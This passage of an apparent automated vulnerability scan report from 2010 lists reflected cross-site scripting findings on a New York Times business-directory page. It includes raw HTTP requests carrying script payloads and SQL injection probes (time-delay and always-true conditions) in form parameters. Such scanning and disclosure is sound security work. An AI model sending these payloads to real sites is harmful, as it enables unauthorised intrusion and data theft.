5-297311&sLsIdsB=125-551828%2c125-552791%2c125-552803%2c125-453304%2c125-552666%2c125-521482%2c125-521477%2c125-521479%2c125-488823%2c125-545359&sLsIdsC=125-527579%2c125-525464%2c125-527584%2c125-475581%2c125-510064%2c125-565038%2c125-554987%2c125-559008%2c125-525927%2c125-526128&sLsIdsD=125-526018%2c125-526144%2c125-529057%2c125-567748%2c125-526023%2c125-555190%2c125-559612%2c125-555175%2c125-554984%2c125-547837&sLsIdsE=125-547750%2c125-548054%2c125-525923%2c125-494906%2c125-531825%2c125-550469%2c125-567828%2c125-490106%2c125-566918%2c125-529618&sLsIdsF=125-463922%2c125-464100%2c125-488817%2c125-557391%2c125-522086%2c125-548195%2c125-553895%2c125-558344%2c125-564715%2c125-556870&sLsIdsG=125-554611%2c125-518058%2c125-532291%2c125-532292%2c125-482057%2c125-569094%2c125-555551%2c125-462478%2c125-469804%2c125-500828&sLsIdsH=125-504736%2c125-521946%2c125-517146%2c125-518850%2c125-524081%2c125-527129%2c125-527511%2c125-527508%2c125-528677%2c125-533450&sLsIdsI=125-540051%2c125-544122%2c125-549166%2c125-546131%2c125-550891%2c125-563445%2c125-560883%2c125-560309%2c125-565198%2c125-565179&sLsIdsJ=125-566478%2c125-566482%2c125-564856%2c125-565126%2c125-569444%2c125-531599%2c125-550866%2c125-560171%2c125-539587%2c125-567941&sLsIdsK=125-566956%2c125-513013%2c125-493766%2c125-521916%2c125-522018%2c125-554134%2c125-521507%2c125-521264%2c125-541992%2c125-521281&sLsIdsL=125-557904%2c125-565259%2c125-442451%2c125-551241%2c125-488296%2c125-568500%2c125-569515%2c125-548226%2c125-559444%2c125-565130&sLsIdsM=125-395953%2c125-491487%2c125-444457%2c125-464308%2c125-454440%2c125-454446%2c125-472602%2c125-418913%2c125-422194%2c125-561731&sLsIdsN=125-483424%2c125-471203%2c125-430646%2c125-436208%2c125-561736%2c125-394065%2c125-539553%2c125-454345%2c125-463424%2c125-470693&sLsIdsO=125-470909%2c125-481310%2c125-486834%2c125-490712%2c125-419767%2c125-497400%2c125-561713%2c125-496638%2c125-498359%2c125-499448&sLsIdsP=125-499423%2c125-499451%2c125-500061%2c125-500014%2c125-501827%2c125-504342%2c125-505889%2c125-505964%2c125-507572%2c125-561739&sLsIdsQ=125-512454%2c125-531166%2c125-510950%2c125-519482%2c125-550392%2c125-486912%2c125-560934%2c125-555722%2c125-562036%2c125-555902&sLsIdsR=125-493413%2c125-548107%2c125-566195%2c125-549209%2c125-496651%2c125-550801%2c125-551463%2c125-564528%2c125-544691%2c125-511935&sLsIdsS=125-513610%2c125-514528%2c125-514558%2c125-518925%2c125-534894%2c125-519626%2c125-521135%2c125-521146%2c125-531280%2c125-524507&sLsIdsT=125-524511%2c125-548214%2c125-523820%2c125-561740%2c125-535592%2c125-526559%2c125-561743%2c125-543364%2c125-526572%2c125-535768&sLsIdsU=125-561744%2c125-540337%2c125-530055%2c125-539271%2c125-533352%2c125-534277%2c125-554091%2c125-535784%2c125-536134%2c125-536168&sLsIdsV=125-537139%2c125-538939%2c125-537922%2c125-561745%2c125-540042%2c125-542538%2c125-561832%2c125-560772%2c125-561851%2c125-554861&sLsIdsW=125-545138%2c125-561852%2c125-561853%2c125-561855%2c125-561856%2c125-561860%2c125-553593%2c125-561861%2c125-557156%2c125-561863&sLsIdsX=125-560787%2c125-555117%2c125-555993%2c125-560783%2c125-558689%2c125-557187%2c125-557539%2c125-560788%2c125-560650%2c125-562241&sLsIdsY=125-564252%2c125-472625%2c125-565009%2c125-565408%2c125-565406%2c125-566364%2c125-566155%2c125-566429%2c125-569520%2c125-560929&sLsIdsZ=125-490731%2c125-505509%2c125-552073%2c125-512867%2c125-528218%2c125-528217%2c125-546102%2c125-564120%2c125-564628%2c125-528175&SoL=&SOrder=A&Sort=D&strRegion=all+areas&strRegions=5%2bAll+Areas%3a%3a50000%2bAlabama%3a%3a51000%2bAlaska%3a%3a52000%2bArizona%3a%3a53000%2bArkansas%3a%3a54100%2bCalifornia%3a%3a55000%2bColorado%3a%3a56000%2bConnecticut%3a%3a57000%2bDelaware%3a%3a59100%2bFlorida%3a%3a60000%2bGeorgia%3a%3a61000%2bHawaii%3a%3a62000%2bIdaho%3a%3a63000%2bIllinois%3a%3a64000%2bIndiana%3a%3a65000%2bIowa%3a%3a66000%2bKansas%3a%3a67000%2bKentucky%3a%3a68100%2bLouisiana%3a%3a69000%2bMaine%3a%3a70000%2bMaryland%3a%3a71200%2bMassachusetts%3a%3a72000%2bMichigan%3a%3a73000%2bMinnesota%3a%3a74000%2bMississippi%3a%3a75000%2bMissouri%3a%3a76000%2bMontana%3a%3a77000%2bNebraska%3a%3a78100%2bNevada%3a%3a79000%2bNew+Hampshire%3a%3a80100%2bNew+Jersey%3a%3a81000%2bNew+Mexico%3a%3a2022%2bNew+York%3a%3a82400%2bNew+York+City+Metro+Area%3a%3a83000%2bNorth+Carolina%3a%3a84000%2bNorth+Datoka%3a%3a85000%2bOhio%3a%3a86000%2bOklahoma%3a%3a87000%2bOregon%3a%3a88000%2bPennsylvania%3a%3a89000%2bRhode+Island%3a%3a90000%2bSouth+Carolina%3a%3a91000%2bSouth+Dakota%3a%3a92000%2bTennessee%3a%3a93000%2bTexas%3a%3a94000%2bUtah%3a%3a95000%2bVermont%3a%3a96000%2bVirginia%3a%3a97000%2bWashington%3a%3a58000%2bWashington+D.C.%3a%3a98000%2bWest+Virginia%3a%3a99000%2bWisconsin%3a%3a100000%2bWyoming%3a%3a&strSQL3=Execute+uspSearchListingsByLsIds+'BIZDIR'%2c&strStates=&SubCatId=de4a9"><script>alert(1)</script>688b776b6073a4688&ThisPage=1 HTTP/1.1
Referer: http://listings.nytimes.com/BusinessDirectory/List_Listings.asp
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322;)
Cache-Control: no-cache
Host: listings.nytimes.com
Cookie: ASPSESSIONIDSCDTQSBS=CIDMHLFAMCCFKPLBBHALLAAF
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Mon, 15 Nov 2010 07:23:40 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 91598
Content-Type: text/html
Set-Cookie: ASPSESSIONIDCADTSTCS=FIIPGLGAAPHAPJMIKGDKKEOG; path=/
Cache-control: private

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >

   
   <head>
       <meta http-equi
...[SNIP]...
<input type="hidden" name="SubCatId" value="de4a9"><script>alert(1)</script>688b776b6073a4688">
...[SNIP]...

4.231. http://listings.nytimes.com/BusinessDirectory/List_Listings.asp [SubCatId parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://listings.nytimes.com
Path:   /BusinessDirectory/List_Listings.asp

Issue detail

The value of the SubCatId request parameter is copied into the HTML document as plain text between tags. The payload 98662<script>alert(1)</script>4d433290d8a58f5b0 was submitted in the SubCatId parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /BusinessDirectory/List_Listings.asp?ChangeEmail=%27;WAITFOR%20DELAY%20%270:0:25%27--&KeyWord=--+Keyword+--&RegionId=3&SubCatId=398662<script>alert(1)</script>4d433290d8a58f5b0&AdTagCountyId=3&AdTagPriceIndx=3&Amenities=3&CategoryId=BIZDIR&ChangeEmail=netsparker%40example.com&ctRS=10&GroupId=3&intl=3&KeyWord=3&Lid=3&LIndex=3&RegionId=3&SoL=3&strLsId=80-N1011083%2c80-N1009073%2c80-N906131%2c80-N1011114%2c80-N1011021%2c80-N1008162%2c80-N1011102%2c80-N1009292%2c80-N1011022%2c80-N1010281&strStates=3&SubCatId=3&UserEmail=netsparker%40example.com&UserPwd=3 HTTP/1.1
Referer: http://listings.nytimes.com/BusinessDirectory/List_Listings.asp?ChangeEmail=&KeyWord=--+Keyword+--&RegionId=&SubCatId=
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322;)
Cache-Control: no-cache
Host: listings.nytimes.com
Cookie: ASPSESSIONIDSCDTQSBS=CIDMHLFAMCCFKPLBBHALLAAF; ASPSESSIONIDACCRTTDT=EHDHDNGAFBGCHINIICBALKAB; ASPSESSIONIDSCBSSQAT=IBNKJLNDLPHGNPGDKFHLPIOI; ASPSESSIONIDCADQTTDT=ENMHKJGAMFJMFIFDNFGMGMOE; ASPSESSIONIDSABRQSAS=FELKNADAPLOANHOJMNHCBFEN; ASPSESSIONIDCCDTSTDT=JFOLPOGAMCPNEGJMKEMOJBLJ; ASPSESSIONIDSCCSTRAT=EDDDEGAAKEEOJFIKLGKLFKHO
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Mon, 15 Nov 2010 07:30:10 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 552
Content-Type: text/html
Set-Cookie: ASPSESSIONIDACATSTCS=KNJJLAHAJIMAMECMMNKHBOJC; path=/
Cache-control: private

<h1>Form</h1><h1>QueryString</h1>ChangeEmail=%27;WAITFOR%20DELAY%20%270:0:25%27--&KeyWord=--+Keyword+--&RegionId=3&SubCatId=398662<script>alert(1)</script>4d433290d8a58f5b0&AdTagCountyId=3&AdTagPriceIndx=3&Amenities=3&CategoryId=BIZDIR&ChangeEmail=netsparker%40example.com&ctRS=10&GroupId=3&intl=3&KeyWord=3&Lid=3&LIndex=3&RegionId=3&SoL=3&strLsId=80-N1011083%2c80-N1009073
...[SNIP]...

4.232. http://listings.nytimes.com/BusinessDirectory/List_Listings.asp [ThisPage parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://listings.nytimes.com
Path:   /BusinessDirectory/List_Listings.asp

Issue detail

The value of the ThisPage request parameter is copied into the HTML document as plain text between tags. The payload 1d781<script>alert(1)</script>2c4a8ac9ff523ba54 was submitted in the ThisPage parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /BusinessDirectory/List_Listings.asp?AdTagCountyId=1;WAITFOR%20DELAY%20%270:0:25%27--&AdTagPriceIndx=3&CategoryId=BIZDIR&ChangeEmail=netsparker%40example.com&cid=999&DOrder=A&GroupId=3&intl=3&KeyWord=3&LastPage=40&LOrder=A&NOrder=A&Order=A&POrder=A&RegionId=3&ROrder=A&RSCount=2500&sLsIds0=80-N1011083%2c80-N1009073%2c80-N906131%2c80-N1011114%2c80-N1011021%2c80-N1008162%2c80-N1011102%2c80-N1009292%2c80-N1011022%2c80-N1010281&sLsIds1=80-N1010223%2c80-N1010192%2c80-N1011111%2c80-N1011051%2c80-N1010272%2c80-N1011071%2c80-N1009282%2c80-N1010211%2c80-N1011121%2c80-N1009242&sLsIds2=80-N1010218%2c20-1000297132_020%2c125-454145%2c125-500168%2c125-561603%2c125-557500%2c125-505633%2c125-502057%2c125-569378%2c125-451879&sLsIds3=125-563290%2c125-492069%2c125-487258%2c125-473954%2c125-516760%2c125-529105%2c125-529136%2c125-565044%2c125-452044%2c125-471500&sLsIds4=125-558791%2c125-555521%2c125-561463%2c125-549434%2c125-434068%2c125-530728%2c125-564022%2c125-557581%2c125-560091%2c125-563157&sLsIds5=125-491745%2c125-547950%2c125-509222%2c125-568138%2c125-557766%2c125-559177%2c125-537020%2c125-506111%2c125-560157%2c125-566240&sLsIds6=125-557675%2c125-551396%2c125-559267%2c125-533573%2c125-458445%2c125-538467%2c125-471913%2c125-482897%2c125-535950%2c125-499401&sLsIds7=125-486445%2c125-529496%2c125-429362%2c125-501989%2c125-502772%2c125-534073%2c125-530131%2c125-494155%2c125-517168%2c125-557932&sLsIds8=125-514452%2c125-541145%2c125-416753%2c125-444446%2c125-537604%2c125-502641%2c125-567841%2c125-564153%2c20-1000290506_030%2c125-570359&sLsIds9=125-539476%2c125-431610%2c125-442946%2c125-560310%2c125-497124%2c125-529949%2c125-568533%2c125-558371%2c125-553006%2c125-553112&sLsIdsA=125-560826%2c125-549432%2c125-552794%2c125-545063%2c125-552800%2c125-549795%2c125-552790%2c125-552796%2c125-551814%2c125-545983&sLsIdsAA=125-553610%2c125-518851%2c125-553607%2c125-556074%2c125-558240%2c125-499512%2c125-526065%2c125-462985%2c125-544762%2c125-560817&sLsIdsAB=125-522621%2c125-567005%2c125-364577%2c125-333056%2c125-565752%2c125-389754%2c125-405051%2c125-558962%2c125-441721%2c125-542506&sLsIdsAC=125-521855%2c125-495755%2c125-503906%2c125-565552%2c125-556750%2c125-475131%2c125-202650%2c125-510030%2c125-570191%2c125-475695&sLsIdsAD=125-555585%2c125-565528%2c125-520249%2c125-541247%2c125-556121%2c125-547008%2c125-568447%2c125-545194%2c125-512492%2c125-297311&sLsIdsB=125-551828%2c125-552791%2c125-552803%2c125-453304%2c125-552666%2c125-521482%2c125-521477%2c125-521479%2c125-488823%2c125-545359&sLsIdsC=125-527579%2c125-525464%2c125-527584%2c125-475581%2c125-510064%2c125-565038%2c125-554987%2c125-559008%2c125-525927%2c125-526128&sLsIdsD=125-526018%2c125-526144%2c125-529057%2c125-567748%2c125-526023%2c125-555190%2c125-559612%2c125-555175%2c125-554984%2c125-547837&sLsIdsE=125-547750%2c125-548054%2c125-525923%2c125-494906%2c125-531825%2c125-550469%2c125-567828%2c125-490106%2c125-566918%2c125-529618&sLsIdsF=125-463922%2c125-464100%2c125-488817%2c125-557391%2c125-522086%2c125-548195%2c125-553895%2c125-558344%2c125-564715%2c125-556870&sLsIdsG=125-554611%2c125-518058%2c125-532291%2c125-532292%2c125-482057%2c125-569094%2c125-555551%2c125-462478%2c125-469804%2c125-500828&sLsIdsH=125-504736%2c125-521946%2c125-517146%2c125-518850%2c125-524081%2c125-527129%2c125-527511%2c125-527508%2c125-528677%2c125-533450&sLsIdsI=125-540051%2c125-544122%2c125-549166%2c125-546131%2c125-550891%2c125-563445%2c125-560883%2c125-560309%2c125-565198%2c125-565179&sLsIdsJ=125-566478%2c125-566482%2c125-564856%2c125-565126%2c125-569444%2c125-531599%2c125-550866%2c125-560171%2c125-539587%2c125-567941&sLsIdsK=125-566956%2c125-513013%2c125-493766%2c125-521916%2c125-522018%2c125-554134%2c125-521507%2c125-521264%2c125-541992%2c125-521281&sLsIdsL=125-557904%2c125-565259%2c125-442451%2c125-551241%2c125-488296%2c125-568500%2c125-569515%2c125-548226%2c125-559444%2c125-565130&sLsIdsM=125-395953%2c125-491487%2c125-444457%2c125-464308%2c125-454440%2c125-454446%2c125-472602%2c125-418913%2c125-422194%2c125-561731&sLsIdsN=125-483424%2c125-471203%2c125-430646%2c125-436208%2c125-561736%2c125-394065%2c125-539553%2c125-454345%2c125-463424%2c125-470693&sLsIdsO=125-470909%2c125-481310%2c125-486834%2c125-490712%2c125-419767%2c125-497400%2c125-561713%2c125-496638%2c125-498359%2c125-499448&sLsIdsP=125-499423%2c125-499451%2c125-500061%2c125-500014%2c125-501827%2c125-504342%2c125-505889%2c125-505964%2c125-507572%2c125-561739&sLsIdsQ=125-512454%2c125-531166%2c125-510950%2c125-519482%2c125-550392%2c125-486912%2c125-560934%2c125-555722%2c125-562036%2c125-555902&sLsIdsR=125-493413%2c125-548107%2c125-566195%2c125-549209%2c125-496651%2c125-550801%2c125-551463%2c125-564528%2c125-544691%2c125-511935&sLsIdsS=125-513610%2c125-514528%2c125-514558%2c125-518925%2c125-534894%2c125-519626%2c125-521135%2c125-521146%2c125-531280%2c125-524507&sLsIdsT=125-524511%2c125-548214%2c125-523820%2c125-561740%2c125-535592%2c125-526559%2c125-561743%2c125-543364%2c125-526572%2c125-535768&sLsIdsU=125-561744%2c125-540337%2c125-530055%2c125-539271%2c125-533352%2c125-534277%2c125-554091%2c125-535784%2c125-536134%2c125-536168&sLsIdsV=125-537139%2c125-538939%2c125-537922%2c125-561745%2c125-540042%2c125-542538%2c125-561832%2c125-560772%2c125-561851%2c125-554861&sLsIdsW=125-545138%2c125-561852%2c125-561853%2c125-561855%2c125-561856%2c125-561860%2c125-553593%2c125-561861%2c125-557156%2c125-561863&sLsIdsX=125-560787%2c125-555117%2c125-555993%2c125-560783%2c125-558689%2c125-557187%2c125-557539%2c125-560788%2c125-560650%2c125-562241&sLsIdsY=125-564252%2c125-472625%2c125-565009%2c125-565408%2c125-565406%2c125-566364%2c125-566155%2c125-566429%2c125-569520%2c125-560929&sLsIdsZ=125-490731%2c125-505509%2c125-552073%2c125-512867%2c125-528218%2c125-528217%2c125-546102%2c125-564120%2c125-564628%2c125-528175&SoL=3&SOrder=A&Sort=D&strRegion=all+areas&strRegions=5%2bAll+Areas%3a%3a50000%2bAlabama%3a%3a51000%2bAlaska%3a%3a52000%2bArizona%3a%3a53000%2bArkansas%3a%3a54100%2bCalifornia%3a%3a55000%2bColorado%3a%3a56000%2bConnecticut%3a%3a57000%2bDelaware%3a%3a59100%2bFlorida%3a%3a60000%2bGeorgia%3a%3a61000%2bHawaii%3a%3a62000%2bIdaho%3a%3a63000%2bIllinois%3a%3a64000%2bIndiana%3a%3a65000%2bIowa%3a%3a66000%2bKansas%3a%3a67000%2bKentucky%3a%3a68100%2bLouisiana%3a%3a69000%2bMaine%3a%3a70000%2bMaryland%3a%3a71200%2bMassachusetts%3a%3a72000%2bMichigan%3a%3a73000%2bMinnesota%3a%3a74000%2bMississippi%3a%3a75000%2bMissouri%3a%3a76000%2bMontana%3a%3a77000%2bNebraska%3a%3a78100%2bNevada%3a%3a79000%2bNew+Hampshire%3a%3a80100%2bNew+Jersey%3a%3a81000%2bNew+Mexico%3a%3a2022%2bNew+York%3a%3a82400%2bNew+York+City+Metro+Area%3a%3a83000%2bNorth+Carolina%3a%3a84000%2bNorth+Datoka%3a%3a85000%2bOhio%3a%3a86000%2bOklahoma%3a%3a87000%2bOregon%3a%3a88000%2bPennsylvania%3a%3a89000%2bRhode+Island%3a%3a90000%2bSouth+Carolina%3a%3a91000%2bSouth+Dakota%3a%3a92000%2bTennessee%3a%3a93000%2bTexas%3a%3a94000%2bUtah%3a%3a95000%2bVermont%3a%3a96000%2bVirginia%3a%3a97000%2bWashington%3a%3a58000%2bWashington+D.C.%3a%3a98000%2bWest+Virginia%3a%3a99000%2bWisconsin%3a%3a100000%2bWyoming%3a%3a&strSQL3=Execute+uspSearchListingsByLsIds+'BIZDIR'%2c&strStates=3&SubCatId=3&ThisPage=11d781<script>alert(1)</script>2c4a8ac9ff523ba54 HTTP/1.1
Referer: http://listings.nytimes.com/BusinessDirectory/List_Listings.asp
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322;)
Cache-Control: no-cache
Host: listings.nytimes.com
Cookie: ASPSESSIONIDSCDTQSBS=CIDMHLFAMCCFKPLBBHALLAAF; ASPSESSIONIDACCRTTDT=EHDHDNGAFBGCHINIICBALKAB; ASPSESSIONIDSCBSSQAT=IBNKJLNDLPHGNPGDKFHLPIOI; ASPSESSIONIDCADQTTDT=ENMHKJGAMFJMFIFDNFGMGMOE; ASPSESSIONIDSABRQSAS=FELKNADAPLOANHOJMNHCBFEN; ASPSESSIONIDCCDTSTDT=JFOLPOGAMCPNEGJMKEMOJBLJ; ASPSESSIONIDSCCSTRAT=EDDDEGAAKEEOJFIKLGKLFKHO; ASPSESSIONIDCADTSTCS=JDIPGLGAGKINHNJPBNGFIHLA
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Mon, 15 Nov 2010 15:35:15 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 7151
Content-Type: text/html
Set-Cookie: ASPSESSIONIDCCARSTDT=GGLHEJKAEPNAIGNDDPFLFFKD; path=/
Cache-control: private

<h1>Form</h1><h1>QueryString</h1>AdTagCountyId=1;WAITFOR%20DELAY%20%270:0:25%27--&AdTagPriceIndx=3&CategoryId=BIZDIR&ChangeEmail=netsparker%40example.com&cid=999&DOrder=A&GroupId=3&intl=3&KeyWord=3&La
...[SNIP]...
hington%3a%3a58000%2bWashington+D.C.%3a%3a98000%2bWest+Virginia%3a%3a99000%2bWisconsin%3a%3a100000%2bWyoming%3a%3a&strSQL3=Execute+uspSearchListingsByLsIds+'BIZDIR'%2c&strStates=3&SubCatId=3&ThisPage=11d781<script>alert(1)</script>2c4a8ac9ff523ba54

4.233. http://listings.nytimes.com/BusinessDirectory/List_Listings.asp [ThisPage parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://listings.nytimes.com
Path:   /BusinessDirectory/List_Listings.asp

Issue detail

The value of the ThisPage request parameter is copied into the HTML document as plain text between tags. The payload d7b6f<script>alert(1)</script>805ab0a08fb was submitted in the ThisPage parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

POST /BusinessDirectory/List_Listings.asp HTTP/1.1
Referer: http://listings.nytimes.com/BusinessDirectory/List_Listings.asp
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322;)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: listings.nytimes.com
Cookie: ASPSESSIONIDSCDTQSBS=CIDMHLFAMCCFKPLBBHALLAAF; ASPSESSIONIDACCRTTDT=EHDHDNGAFBGCHINIICBALKAB; ASPSESSIONIDSCBSSQAT=IBNKJLNDLPHGNPGDKFHLPIOI; ASPSESSIONIDCADQTTDT=ENMHKJGAMFJMFIFDNFGMGMOE; ASPSESSIONIDSABRQSAS=FELKNADAPLOANHOJMNHCBFEN; ASPSESSIONIDCCDTSTDT=JFOLPOGAMCPNEGJMKEMOJBLJ; ASPSESSIONIDSCCSTRAT=EDDDEGAAKEEOJFIKLGKLFKHO; ASPSESSIONIDCADTSTCS=KDIPGLGAPHDILBCBFEABDOGA
Accept-Encoding: gzip, deflate
Content-Length: 7048

AdTagCountyId=' OR '1'='1&AdTagPriceIndx=3&CategoryId=BIZDIR&ChangeEmail=netsparker%40example.com&cid=999&DOrder=A&GroupId=3&intl=3&KeyWord=3&LastPage=40&LOrder=A&NOrder=A&Order=A&POrder=A&RegionId=3&
...[SNIP]...
ington%3a%3a58000%2bWashington+D.C.%3a%3a98000%2bWest+Virginia%3a%3a99000%2bWisconsin%3a%3a100000%2bWyoming%3a%3a&strSQL3=Execute+uspSearchListingsByLsIds+'BIZDIR'%2c&strStates=3&SubCatId=3&ThisPage=1d7b6f<script>alert(1)</script>805ab0a08fb

Response

HTTP/1.1 200 OK
Date: Mon, 15 Nov 2010 07:49:35 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 7122
Content-Type: text/html
Cache-control: private

<h1>Form</h1>AdTagCountyId=' OR '1'='1&AdTagPriceIndx=3&CategoryId=BIZDIR&ChangeEmail=netsparker%40example.com&cid=999&DOrder=A&GroupId=3&intl=3&KeyWord=3&LastPage=40&LOrder=A&NOrder=A&Order=A&POrder=
...[SNIP]...
hington%3a%3a58000%2bWashington+D.C.%3a%3a98000%2bWest+Virginia%3a%3a99000%2bWisconsin%3a%3a100000%2bWyoming%3a%3a&strSQL3=Execute+uspSearchListingsByLsIds+'BIZDIR'%2c&strStates=3&SubCatId=3&ThisPage=1d7b6f<script>alert(1)</script>805ab0a08fb<h1>
...[SNIP]...

4.234. http://listings.nytimes.com/BusinessDirectory/List_Listings.asp [UserEmail parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://listings.nytimes.com
Path:   /BusinessDirectory/List_Listings.asp

Issue detail

The value of the UserEmail request parameter is copied into the HTML document as plain text between tags. The payload b3cef<script>alert(1)</script>7ea6a908874 was submitted in the UserEmail parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

POST /BusinessDirectory/List_Listings.asp HTTP/1.1
Referer: http://listings.nytimes.com/BusinessDirectory/List_Listings.asp
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322;)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: listings.nytimes.com
Cookie: ASPSESSIONIDSCDTQSBS=CIDMHLFAMCCFKPLBBHALLAAF; ASPSESSIONIDACCRTTDT=EHDHDNGAFBGCHINIICBALKAB; ASPSESSIONIDSCBSSQAT=IBNKJLNDLPHGNPGDKFHLPIOI; ASPSESSIONIDCADQTTDT=ENMHKJGAMFJMFIFDNFGMGMOE; ASPSESSIONIDSABRQSAS=FELKNADAPLOANHOJMNHCBFEN; ASPSESSIONIDCCDTSTDT=JFOLPOGAMCPNEGJMKEMOJBLJ; ASPSESSIONIDSCCSTRAT=EDDDEGAAKEEOJFIKLGKLFKHO; ASPSESSIONIDCADTSTCS=KDIPGLGAPHDILBCBFEABDOGA
Accept-Encoding: gzip, deflate
Content-Length: 391

AdTagCountyId=1 AND 'NS='ss&AdTagPriceIndx=3&Amenities=3&CategoryId=BIZDIR&ChangeEmail=netsparker%40example.com&ctRS=10&GroupId=3&intl=3&KeyWord=3&Lid=3&LIndex=3&RegionId=3&SoL=3&strLsId=80-N1011083%2c80-N1009073%2c80-N906131%2c80-N1011114%2c80-N1011021%2c80-N1008162%2c80-N1011102%2c80-N1009292%2c80-N1011022%2c80-N1010281&strStates=3&SubCatId=3&UserEmail=netsparker%40example.comb3cef<script>alert(1)</script>7ea6a908874&UserPwd=3

Response

HTTP/1.1 200 OK
Date: Mon, 15 Nov 2010 07:23:11 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 465
Content-Type: text/html
Cache-control: private

<h1>Form</h1>AdTagCountyId=1 AND 'NS='ss&AdTagPriceIndx=3&Amenities=3&CategoryId=BIZDIR&ChangeEmail=netsparker%40example.com&ctRS=10&GroupId=3&intl=3&KeyWord=3&Lid=3&LIndex=3&RegionId=3&SoL=3&strLsId=80-N1011083%2c80-N1009073%2c80-N906131%2c80-N1011114%2c80-N1011021%2c80-N1008162%2c80-N1011102%2c80-N1009292%2c80-N1011022%2c80-N1010281&strStates=3&SubCatId=3&UserEmail=netsparker%40example.comb3cef<script>alert(1)</script>7ea6a908874&UserPwd=3<h1>
...[SNIP]...

4.235. http://listings.nytimes.com/BusinessDirectory/List_Listings.asp [UserEmail parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://listings.nytimes.com
Path:   /BusinessDirectory/List_Listings.asp

Issue detail

The value of the UserEmail request parameter is copied into the HTML document as plain text between tags. The payload a3612<script>alert(1)</script>84f5d46c47b4fc882 was submitted in the UserEmail parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /BusinessDirectory/List_Listings.asp?ChangeEmail=%27;WAITFOR%20DELAY%20%270:0:25%27--&KeyWord=--+Keyword+--&RegionId=3&SubCatId=3&AdTagCountyId=3&AdTagPriceIndx=3&Amenities=3&CategoryId=BIZDIR&ChangeEmail=netsparker%40example.com&ctRS=10&GroupId=3&intl=3&KeyWord=3&Lid=3&LIndex=3&RegionId=3&SoL=3&strLsId=80-N1011083%2c80-N1009073%2c80-N906131%2c80-N1011114%2c80-N1011021%2c80-N1008162%2c80-N1011102%2c80-N1009292%2c80-N1011022%2c80-N1010281&strStates=3&SubCatId=3&UserEmail=netsparker%40example.coma3612<script>alert(1)</script>84f5d46c47b4fc882&UserPwd=3 HTTP/1.1
Referer: http://listings.nytimes.com/BusinessDirectory/List_Listings.asp?ChangeEmail=&KeyWord=--+Keyword+--&RegionId=&SubCatId=
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322;)
Cache-Control: no-cache
Host: listings.nytimes.com
Cookie: ASPSESSIONIDSCDTQSBS=CIDMHLFAMCCFKPLBBHALLAAF; ASPSESSIONIDACCRTTDT=EHDHDNGAFBGCHINIICBALKAB; ASPSESSIONIDSCBSSQAT=IBNKJLNDLPHGNPGDKFHLPIOI; ASPSESSIONIDCADQTTDT=ENMHKJGAMFJMFIFDNFGMGMOE; ASPSESSIONIDSABRQSAS=FELKNADAPLOANHOJMNHCBFEN; ASPSESSIONIDCCDTSTDT=JFOLPOGAMCPNEGJMKEMOJBLJ; ASPSESSIONIDSCCSTRAT=EDDDEGAAKEEOJFIKLGKLFKHO
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Mon, 15 Nov 2010 07:45:04 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 552
Content-Type: text/html
Cache-control: private

<h1>Form</h1><h1>QueryString</h1>ChangeEmail=%27;WAITFOR%20DELAY%20%270:0:25%27--&KeyWord=--+Keyword+--&RegionId=3&SubCatId=3&AdTagCountyId=3&AdTagPriceIndx=3&Amenities=3&CategoryId=BIZDIR&ChangeEmail
...[SNIP]...
trLsId=80-N1011083%2c80-N1009073%2c80-N906131%2c80-N1011114%2c80-N1011021%2c80-N1008162%2c80-N1011102%2c80-N1009292%2c80-N1011022%2c80-N1010281&strStates=3&SubCatId=3&UserEmail=netsparker%40example.coma3612<script>alert(1)</script>84f5d46c47b4fc882&UserPwd=3

